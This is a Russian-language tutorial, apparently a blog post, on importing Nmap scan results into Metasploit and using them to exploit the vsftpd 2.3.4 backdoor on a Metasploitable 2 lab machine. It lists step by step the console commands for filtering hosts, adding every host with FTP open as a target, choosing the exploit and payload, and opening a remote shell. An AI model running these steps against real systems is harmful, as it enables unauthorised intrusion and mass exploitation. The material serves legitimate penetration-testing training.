Metasploit — это лучший фреймворк для тестирования на проникновение. Мы уже рассказывали про использование Metasploit. Сегодня продолжим изучать фреймворк и поговорим про использование результатов сканирование NMAP в Metasploit.
Еще по теме: Взлом VNC с помощью Metasploit
Использование результатов сканирование NMAP в Metasploit
После создания базы данных Metasploit можно перейти к практическому использованию. Например, результаты сканирования Nmap можно экспортировать в формате XML и импортировать в Metasploit, чтобы избежать дополнительных действий по сканированию портов. Эта функция может значительно сэкономить время и позволит запускать один эксплойт против нескольких целей одновременно.
Кроме того, база данных позволяет проводить многоуровневый анализ данных Nmap, например, определять, на скольких объектах открыт порт 443, на скольких хостах установлена ОС Windows и т. д.
Чтобы импортировать результаты сканирования Nmap в Metasploit, выполните команду:
1 |
db_import [nmap_xml_file_name_and_path] |
Теперь для взлома FTP на машине Metasploitable 2 (см. Установка Metasploitable) выполните следующие шаги.
Шаг 1: Чтобы уточнить поиск во всей базе данных для машин на базе Linux, выполните следующую команду, основанную на фильтрах:
1 |
hosts -c address,os_flavor -S Linux |
Шаг 2: Аналогично, для поиска хостов с открытым портом 21 используйте команду:
1 |
services -c info,name -p 21 |
Шаг 3: Чтобы выбрать хосты, выполните команду:
1 |
services -c info,name -p 21 -R |
Эта команда добавит все хосты в список целей, и на них будет последовательно выполняться один и тот же эксплойт.
Шаг 4: Для поиска доступных эксплойтов для конкретного сервиса (в данном случае — FTP) в базе данных выполните команду:
1 |
search vsftpd |
Шаг 5: Чтобы выбрать подходящую полезную нагрузку из базы данных эксплойтов, выполните команду:
1 |
use exploit/unix/ftp/vsftpd_234_backdoor |
Затем выполните команду:
1 |
show options |
Вы увидите ранее включенные в список цели.
Шаг 6: Чтобы найти подходящую полезную нагрузку, выполните команду:
1 |
show payloads |
Затем выберите полезную нагрузку, выполнив команду:
1 |
set payload /cmd/unix/interact |
Шаг 7: Когда все будет готово, выполните команду:
1 |
exploit |
После успешной эксплуатации будет открыта удаленная оболочка для доступа. Используя ее, пентестер может выполнить любую команду и произвести атаки Lateral Movement.
Шаг 8: Чтобы экспортировать текущую базу данных Metasploit в формат CSV, XML или JSON, выполните команду:
1 |
db_export -f [file_format] -o [output_file] |
На этом все. Теперь вы знаете, как использовать результаты сканирование NMAP в Metasploit
ПОЛЕЗНЫЕ ССЫЛКИ:
- Как взломать HTTP порт 80 с помощью Metasploit
- Сканер уязвимостей из Nmap с помощью Vulscan
- Использование Nmap-vulners для поиска уязвимостей